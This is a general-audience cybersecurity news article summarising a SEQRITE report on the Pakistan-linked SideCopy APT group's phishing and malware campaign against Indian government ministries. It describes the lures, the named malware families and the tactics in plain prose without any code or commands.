Pakistan-Linked SideCopy APT Strikes Indian Government Agencies

A well-known hacker group named SideCopy APT is targeting Indian government ministries and critical infrastructure with dangerous cyberattacks. According to a recent report from cybersecurity company SEQRITE, this group is using fake government emails and infected files to secretly install malware on victims’ computers. The goal is to steal sensitive documents and spy on important systems.

This new wave of attacks shows how advanced and focused cybercriminals have become when targeting government and military sectors. SideCopy has been active for years and is known to work in the interests of Pakistan, often mimicking other hacker groups to hide its real identity.

What Is SideCopy APT?

SideCopy is an advanced persistent threat (APT) group. That means it carefully plans long-term attacks to infiltrate and stay hidden inside systems, especially those belonging to government or military targets. The group was first discovered in 2019 and is believed to be connected to Transparent Tribe (also known as APT36), another group with links to Pakistan.

What makes SideCopy dangerous is its use of social engineering, smart malware, and customized tools to infect victims without raising suspicion.

How the Attack Works

The current campaign begins with fake emails or compromised websites that pretend to offer official documents. These include:

• PDF files that look like government notices

• ZIP files containing Word documents or executables

• Infected Microsoft Word files with macros

Once a user opens one of these files, malware quietly gets installed on their computer. From there, the attackers can steal data, control the system remotely, or install more harmful tools.

SEQRITE researchers identified several malware types in this campaign:

1. ReverseRAT – This allows hackers to take full control of the infected machine. It can capture screenshots, manage files, and execute commands remotely.

2. AllaKore RAT – A lightweight remote access trojan used for surveillance. It logs keystrokes, records activity, and transfers stolen files.

3. CStealer – A password stealer that grabs saved browser credentials and uploads them to the hacker’s server.

4. Keylogger Payloads – These tools silently record everything typed on the keyboard, including passwords, personal messages, and confidential details.

Tactics, Techniques, and Procedures (TTPs)

SideCopy uses some very clever methods to trick victims:

• Masquerading: Files are named to look like they come from Indian government bodies such as “Rashtriya Suraksha Mantralaya” or “PMO India,” making them seem trustworthy.

• Living-off-the-land techniques: The group uses legitimate Windows tools like mshta.exe, rundll32.exe, and Regsvr32.exe to execute malicious code, helping them avoid detection by antivirus software.

• Anti-analysis methods: The malware includes checks to avoid running on virtual machines, which are often used by security researchers for analysis. This helps the malware stay hidden during investigations.

• Encrypted communication: Once malware is installed, it connects to command-and-control (C2) servers using secure channels. These servers are hosted on hacked websites, mostly based in the South Asia region.